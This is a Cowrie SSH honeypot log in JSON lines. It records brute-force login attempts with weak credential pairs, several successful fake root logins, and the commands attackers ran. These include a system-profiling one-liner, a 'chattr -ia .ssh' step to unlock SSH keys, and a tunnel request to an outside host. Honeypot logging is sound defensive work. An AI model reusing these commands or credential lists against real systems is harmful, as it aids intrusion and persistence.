{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.557514Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.558103Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:01:49.558671Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:01:50.607341Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:01:50.608181Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:01:50.609279Z","src_ip":"212.227.235.229","session":"815b44c597ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54864,"dst_ip":"1.2.3.4","dst_port":22,"session":"f076a0a0434b","protocol":"ssh","message":"New connection: 212.227.235.229:54864 (1.2.3.4:22) [session: f076a0a0434b]","sensor":"my-vps","timestamp":"2025-08-31T05:01:51.076318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:01:51.077255Z","src_ip":"212.227.235.229","session":"f076a0a0434b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:01:51.619080Z","src_ip":"212.227.235.229","session":"f076a0a0434b"}
{"eventid":"cowrie.login.failed","username":"user","password":"!QAZ2wsx3edc","message":"login attempt [user/!QAZ2wsx3edc] failed","sensor":"my-vps","timestamp":"2025-08-31T05:01:51.948115Z","src_ip":"212.227.235.229","session":"f076a0a0434b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:01:52.096057Z","src_ip":"212.227.235.229","session":"8cdcd62d8286"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:01:52.097767Z","src_ip":"212.227.235.229","session":"8cdcd62d8286"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:01:53.033690Z","src_ip":"212.227.235.229","session":"f076a0a0434b"}
{"eventid":"cowrie.session.closed","duration":"79.6","message":"Connection lost after 79.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:01:54.144101Z","src_ip":"212.227.235.229","session":"f74acf6b9881"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36058,"dst_ip":"1.2.3.4","dst_port":22,"session":"535f5cfbbff8","protocol":"ssh","message":"New connection: 212.227.125.160:36058 (1.2.3.4:22) [session: 535f5cfbbff8]","sensor":"my-vps","timestamp":"2025-08-31T05:02:02.524712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:02:03.021576Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:02:03.022433Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.login.success","username":"root","password":"letmein","message":"login attempt [root/letmein] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.160256Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:02:05.906507Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.907355Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.907842Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.909301Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.911544Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.912635Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.913930Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.916532Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.917144Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.917606Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.918173Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.919136Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:02:05.920116Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:02:06.659683Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:06.660639Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:06.662377Z","src_ip":"212.227.125.160","session":"535f5cfbbff8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57732,"dst_ip":"1.2.3.4","dst_port":22,"session":"d21027b239a7","protocol":"ssh","message":"New connection: 212.227.235.229:57732 (1.2.3.4:22) [session: d21027b239a7]","sensor":"my-vps","timestamp":"2025-08-31T05:02:10.002511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:10.003300Z","src_ip":"212.227.235.229","session":"d21027b239a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:10.128339Z","src_ip":"212.227.235.229","session":"d21027b239a7"}
{"eventid":"cowrie.login.failed","username":"lyf","password":"123456","message":"login attempt [lyf/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:02:10.626491Z","src_ip":"212.227.235.229","session":"d21027b239a7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:11.753590Z","src_ip":"212.227.235.229","session":"d21027b239a7"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:02:12.999521Z","src_ip":"212.227.235.229","session":"8cdcd62d8286"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59803,"dst_ip":"1.2.3.4","dst_port":22,"session":"43fc0556af36","protocol":"ssh","message":"New connection: 212.227.235.229:59803 (1.2.3.4:22) [session: 43fc0556af36]","sensor":"my-vps","timestamp":"2025-08-31T05:02:14.783791Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:14.784899Z","src_ip":"212.227.235.229","session":"43fc0556af36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60075,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a3b0c1921e5","protocol":"ssh","message":"New connection: 212.227.235.229:60075 (1.2.3.4:22) [session: 1a3b0c1921e5]","sensor":"my-vps","timestamp":"2025-08-31T05:02:14.915555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:02:14.916425Z","src_ip":"212.227.235.229","session":"1a3b0c1921e5"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T05:02:15.048150Z","src_ip":"212.227.235.229","session":"1a3b0c1921e5"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:02:15.443674Z","src_ip":"212.227.235.229","session":"1a3b0c1921e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T05:02:15.576294Z","session":"1a3b0c1921e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57948,"dst_ip":"1.2.3.4","dst_port":22,"session":"18c683958225","protocol":"ssh","message":"New connection: 212.227.235.229:57948 (1.2.3.4:22) [session: 18c683958225]","sensor":"my-vps","timestamp":"2025-08-31T05:02:18.492116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:02:18.493221Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:02:18.753671Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.login.success","username":"root","password":"Nn123456","message":"login attempt [root/Nn123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:02:19.843376Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:02:20.386277Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:02:20.386989Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:02:20.388041Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:02:20.649559Z","src_ip":"212.227.235.229","session":"18c683958225"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:02:21.450256Z","src_ip":"212.227.235.229","session":"18c683958225"}
